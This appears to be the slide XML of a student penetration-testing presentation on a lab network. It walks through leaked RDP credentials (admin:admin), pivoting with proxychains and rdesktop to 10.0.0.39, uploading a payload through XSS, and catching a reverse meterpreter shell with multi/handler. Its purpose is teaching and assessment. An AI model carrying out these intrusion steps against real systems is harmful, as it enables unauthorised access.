                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ERD Diagram</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>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22" name="Google Shape;222;ga95cb10b87_0_1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="2394625"/>
            <a:ext cx="7207251" cy="42109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gba014e31c3_2_149"/>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Exploit part 2 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="Google Shape;664;gba014e31c3_2_149"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="665" name="Google Shape;665;gba014e31c3_2_149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="772450" y="1804900"/>
            <a:ext cx="4305300" cy="10763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gb9f1380cfe_1_159"/>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672" name="Google Shape;672;gb9f1380cfe_1_159"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="673" name="Google Shape;673;gb9f1380cfe_1_159"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1006120"/>
            <a:ext cx="9144000" cy="2845625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="674" name="Google Shape;674;gb9f1380cfe_1_159"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="5024"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1960725" y="4171174"/>
            <a:ext cx="5191125" cy="26868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gb9f1380cfe_1_168"/>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681" name="Google Shape;681;gb9f1380cfe_1_168"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="682" name="Google Shape;682;gb9f1380cfe_1_168"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="131925" y="189975"/>
            <a:ext cx="8848725" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="683" name="Google Shape;683;gb9f1380cfe_1_168"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1818939" y="4184650"/>
            <a:ext cx="5474680" cy="26733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gb9f1380cfe_1_175"/>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End of Mail server </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690" name="Google Shape;690;gb9f1380cfe_1_175"/>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From the mail between bob and mark, we can see that there is rdp credentials for the file server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>WHich is username:admin and password: admin</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gb2af087021_0_15"/>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Accessing the Windows Computer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="Google Shape;697;gb2af087021_0_15"/>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Set all the necessary requirements such as adding the route &amp; setup a proxy server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>gedit /etc/proxychains.conf (change 127.0.0.1 &amp; port 1080</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="698" name="Google Shape;698;gb2af087021_0_15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="2959200"/>
            <a:ext cx="4268018" cy="11429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gb2af087021_0_24"/>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Accessing the Windows Computer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Google Shape;705;gb2af087021_0_24"/>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Terminate the channel and background the session. After that set up the requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="706" name="Google Shape;706;gb2af087021_0_24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1879650" y="2625925"/>
            <a:ext cx="5048250" cy="4000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gb2af087021_0_31"/>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Accessing the Windows Computer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713" name="Google Shape;713;gb2af087021_0_31"/>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then open a new terminal, and type “proxychains rdesktop 10.0.0.39” → get a gui-based Windows server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="714" name="Google Shape;714;gb2af087021_0_31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="2711974"/>
            <a:ext cx="8039149" cy="340217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gb2af087021_0_39"/>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Accessing the Windows Computer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="721" name="Google Shape;721;gb2af087021_0_39"/>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Now we know the password, getting from ubuntu, we use it and access the Windows file server. And from here we already access the file server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="722" name="Google Shape;722;gb2af087021_0_39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1576289" y="2901725"/>
            <a:ext cx="5960026" cy="350477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gb99faa3ded_2_6"/>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End-Term Assessement Start here</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="729" name="Google Shape;729;gb99faa3ded_2_6"/>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gb99faa3ded_2_12"/>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After getting access to the admin account</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="736" name="Google Shape;736;gb99faa3ded_2_12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392175" y="5469875"/>
            <a:ext cx="7967700" cy="10581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Here is when after doing all of the recon and get all of the information to get the admin account here is the display of the page</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="737" name="Google Shape;737;gb99faa3ded_2_12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1461125" y="1724600"/>
            <a:ext cx="6221749" cy="36396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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665163" y="893763"/>
            <a:ext cx="7781925" cy="60483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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Task Allocation and Progress</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Google Shape;228;p6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1524000"/>
            <a:ext cx="8229600" cy="45261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t>Wafiyuddin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-139700" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="229" name="Google Shape;229;p6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1524000" y="2081700"/>
          <a:ext cx="6096000" cy="3500655"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:noFill/>
                <a:tableStyleId>{5830FC0F-5C3E-4966-B63A-2CCE79721B59}</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5850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" u="none" strike="noStrike" cap="none"/>
                        <a:t>Task </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Progress</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Cross-Site Scripting</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Weak Authentication and Session Management</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>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100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725">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70925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>File upload exploitation on web</a:t>
                      </a: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100%</a:t>
                      </a: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70925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Pivoting</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725">
                    <a:lnT w="38100" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="lt1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725">
                    <a:lnT w="38100" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="lt1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Kerberos Golden Ticket</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Misconfigured RDC</a:t>
                      </a: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800"/>
                        <a:t>100%</a:t>
                      </a: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tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Firewall/Router configuration</a:t>
                      </a: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100%</a:t>
                      </a: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230" name="Google Shape;230;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="5857875"/>
            <a:ext cx="36576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1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Indicate past, current and future task</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b99faa3ef2_0_1"/>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Exploiting of the Web Server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="744" name="Google Shape;744;gb99faa3ef2_0_1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="300050" y="4805800"/>
            <a:ext cx="8429700" cy="180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From the above, the attacker can see that there are file upload and forum. And we know that this website is vulnerable to XSS and then the attack test whether he can upload a payload into the web server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="745" name="Google Shape;745;gb99faa3ef2_0_1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1650251"/>
            <a:ext cx="4419599" cy="2468012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="746" name="Google Shape;746;gb99faa3ef2_0_1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4793722" y="1650248"/>
            <a:ext cx="4197877" cy="246802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ga96dc51dba_0_7"/>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Using XXS to execute the payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="753" name="Google Shape;753;ga96dc51dba_0_7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520750" y="5799950"/>
            <a:ext cx="8073900" cy="769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Use the Script to execute the payload in which give a reverse shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="754" name="Google Shape;754;ga96dc51dba_0_7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="978238" y="1733402"/>
            <a:ext cx="7187526" cy="40665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ga96dc51dba_0_14"/>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Setting up Multi/handler</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="761" name="Google Shape;761;ga96dc51dba_0_14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397425" y="4127150"/>
            <a:ext cx="7477200" cy="2241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Set up the options then refresh the forum paga from there we can get a meterpreter shell → BUT the shell is www-data and not root.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="762" name="Google Shape;762;ga96dc51dba_0_14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1650249"/>
            <a:ext cx="5799576" cy="2324500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="763" name="Google Shape;763;ga96dc51dba_0_14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="430800" y="5422575"/>
